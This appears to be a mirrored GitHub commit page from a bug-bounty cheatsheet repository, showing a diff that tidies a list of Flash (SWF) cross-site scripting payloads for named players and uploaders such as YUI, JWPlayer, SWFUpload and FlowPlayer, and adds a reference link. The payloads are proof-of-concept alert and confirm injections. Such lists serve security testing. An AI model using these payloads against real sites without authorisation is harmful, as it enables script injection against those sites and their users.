Mirrors/bugbounty-cheatsheet
2
0
Fork 0
mirror of https://github.com/EdOverflow/bugbounty-cheatsheet.git synced 2024-11-25 04:20:19 +00:00
Code Issues Projects Releases Packages Wiki Activity

[XSS] clean up Flash payloads and add note

Browse source
This commit is contained in:
Yasin Soliman 2017-09-27 19:48:38 +01:00 committed by GitHub
parent c7775ecdbc
commit c0582d53ab
1 changed files with 5 additions and 3 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

8
cheatsheets/xss.md
View file

@ -122,20 +122,22 @@ javas	cript://www.google.com/%0Aalert(1)
- videoJS: `video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29` - videoJS: `video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29`
- YUI "io.swf": `/io.swf?yid=\"));}catch(e){alert(document.domain);}//` - YUI "io.swf": `io.swf?yid=\"));}catch(e){alert(document.domain);}//`
- YUI "uploader.swf": `uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%29;}//<` - YUI "uploader.swf": `uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%29;}//<`
- Open Flash Chart: `open-flash-chart.swf?get-data=(function(){alert(1)})()` - Open Flash Chart: `open-flash-chart.swf?get-data=(function(){alert(1)})()`
- Banner.swf (unknown): `/banner.swf?clickTAG=javascript:alert(document.domain);//` - Banner.swf (unknown): `banner.swf?clickTAG=javascript:alert(document.domain);//`
- JWPlayer (legacy): `/player.swf?playerready=alert(document.domain)` and `/player.swf?tracecall=alert(document.domain)` - JWPlayer (legacy): `player.swf?playerready=alert(document.domain)` and `/player.swf?tracecall=alert(document.domain)`
- SWFUpload 2.2.0.1: `swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);//` - SWFUpload 2.2.0.1: `swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);//`
- FlowPlayer 3.2.7: `flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf` - FlowPlayer 3.2.7: `flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf`
_Note: Useful reference on SWF XSS construction from [MWR Labs](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/)._
**Lightweight Markup Languages** **Lightweight Markup Languages**
**RubyDoc** (.rdoc) **RubyDoc** (.rdoc)